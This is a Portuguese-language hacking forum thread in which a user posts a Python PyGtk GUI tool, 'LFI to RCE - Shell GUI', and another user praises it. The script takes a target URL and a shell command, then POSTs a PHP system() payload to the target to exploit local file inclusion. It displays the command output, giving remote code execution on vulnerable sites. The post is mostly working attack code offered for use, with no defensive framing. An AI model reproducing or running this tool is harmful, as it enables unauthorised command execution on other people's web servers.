Resultados 1 a 2 de 2

Tópico: [Python] LFI to RCE - GUI PyGtk

  1. #1
    Veterano ingresso
    Data de Ingresso
    Jan 2011
    Localização
    Pguá ~ PR
    Posts
    2.363
    Post Thanks / Like

    Cool [Python] LFI to RCE - GUI PyGtk

    Surgiu essa idéia de desenvolver esse script depois de uma conversa que tive com um amigo a respeito desse assunto,bom adiante um screenshot do script em ação:



    Código PHP:
    #!/usr/bin/python


    from gtk import *
    from sys import argv, exit, platform
    from BeautifulSoup import BeautifulSoup
    from urllib2 import urlopen
        
    class app(Window):
        def __init__(self):
            super(app, self).__init__()
            self.set_title('LFI to RCE - Shell GUI')
            self.set_position(WIN_POS_MOUSE)
            self.set_resizable(False)
            self.set_size_request(700, 400)
            self.connect('destroy',main_quit)
            
            fix = Fixed()
            self.lb1 = Label("Host:")
            self.lb2 = Label("Comando:")
            self.bt1 = Button("Sobre")
            self.bt2 = Button("Exec")
            self.bt3 = Button(stock=STOCK_CLOSE)
            self.tedit1 = Entry()
            self.tedit2 = Entry()
            self.textview = TextView(buffer = None)
            
            self.bt1.set_size_request(70, 23)
            self.bt2.set_size_request(70, 23)
            self.bt3.set_size_request(70, 23)
            self.tedit1.set_size_request(581, 23)
            self.tedit2.set_size_request(548, 23)
            self.textview.set_size_request(613, 326)
            self.textview.set_editable(False)
            
            self.bt1.connect("clicked",self.sobre)
            self.bt2.connect("clicked", self.run)
            self.bt3.connect("clicked", main_quit)
            
            fix.put(self.lb1, 3,5)
            fix.put(self.lb2, 3, 35)
            fix.put(self.bt1, 623, 66)
            fix.put(self.bt2, 623, 19)
            fix.put(self.bt3, 623, 90)
            fix.put(self.tedit1, 40, 3)
            fix.put(self.tedit2, 73, 30)
            fix.put(self.textview, 3, 69)
            
            self.add(fix)
            self.show_all()


        def sobre(self,widget):
            abt = 'LFI to RCE - Shell GUI'
            abtdlg = AboutDialog()
            abtdlg.set_authors(['r00t_5tr1k3r','Greetz: MMxM'])
            abtdlg.set_version('0.2')
            abtdlg.set_comments(abt)
            abtdlg.set_website('http://learngtk.org/')
            abtdlg.set_website_label('LearnGTK')
            abtdlg.run()
            abtdlg.destroy()


        def txtempty(self):
            txt = 'Campo(s) vazio(s).'
            msg = MessageDialog(self, gtk.DIALOG_MODAL, gtk.MESSAGE_ERROR, gtk.BUTTONS_OK,txt )
            msg.run()
            msg.destroy()
            
        def ret(self, link, arg):
            pg = urlopen(link, arg).read()
            return pg    


        def run(self, widget):
            site = self.tedit1.get_text()
            shl  = self.tedit2.get_text()
            
            if len(site) != 0 and len(shl) != 0:
                if not site.startswith('http://'):
                    site = 'http://' + site
                syscm = "<xpl><?php system(\'%s'); ?><xpl>"%shl   
                post = self.ret(site, syscm)   
                soup = BeautifulSoup(post)
                for res in soup.find('xpl'):
                    self.textview.get_buffer().insert_at_cursor(res)
            else:
                self.txtempty()
                
    def ep():
        app()
        main()            
                
                
    if __name__ == '__main__':    
        ep()
    Links para leitura:
    http://packetstormsecurity.com/files...firce-perl.txt
    http://www.pygtk.org/pygtk2tutorial/index.html

    bye

  2. #2
    Hacker ingresso Avatar de guedes.acp
    Data de Ingresso
    Sep 2010
    Localização
    #!/usr/bin/env perl
    Posts
    1.445
    Post Thanks / Like
    Otimo trabalho
    So respondo se a consiencia perguntar!!!
    Não Respondo MP's de perguntas, as faça em um tópico!

    Perl User, Bioinformatcs Programmer!


    just another biomedical perl hacker try to learn Delphi

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •